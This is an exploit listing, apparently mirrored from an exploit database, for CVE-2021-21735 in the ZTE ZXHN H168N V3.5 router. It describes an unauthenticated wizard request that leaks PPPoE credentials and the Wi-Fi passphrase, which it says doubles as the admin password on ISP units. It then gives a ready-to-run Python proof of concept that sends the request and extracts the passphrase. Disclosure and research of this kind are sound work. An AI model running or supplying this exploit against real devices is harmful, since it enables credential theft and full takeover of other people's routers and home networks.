Share
## https://sploitus.com/exploit?id=PACKETSTORM:221649
# Title: ZTE ZXHN H168N V3.5 - Unauthenticated Wizard Credential Leak to
    Full Admin Compromise
    # Date: 2026-05-20
    # Author: Mina Nageh Salalma (Monx Research)
    # CVE: CVE-2021-21735
    # Vendor: ZTE Corporation
    # Affected: ZTE ZXHN H168N V3.5
    # Category: Remote / Webapps
    
    # Description:
    # Unauthenticated POST to the wizard endpoint using GetPassword action
    returns
    # PPPoE credentials (ADUsername, VDUsername) and WLAN KeyPassphrase. In
    # ISP-deployed configurations the Wi-Fi password is also the admin password,
    # making this a full admin compromise chain.
    #
    # MITRE: https://www.cve.org/CVERecord?id=CVE-2021-21735
    # Write-up:
    https://github.com/minanagehsalalma/cve-2021-21735-zte-zxhn-h168n-admin-compromise
    
    # PoC (single target):
    import requests
    
    def check(target):
        data = {"IF_ACTION": "GetPassword", "_InstID_PASS":
    "DEV.WIFI.AP1.PSK1", "PASSTYPE": "PSK"}
        r = requests.post(f"http://{target}/", data=data, timeout=10)
        import re, html
        pw =
    re.search(r"<ParaName>KeyPassphrase</ParaName>\s*<ParaValue>(.*?)</ParaValue>",
    r.text)
        print(f"[+] PSK: {html.unescape(pw.group(1)) if pw else 'not found'}")
    
    if __name__ == "__main__":
        import sys
        check(sys.argv[1])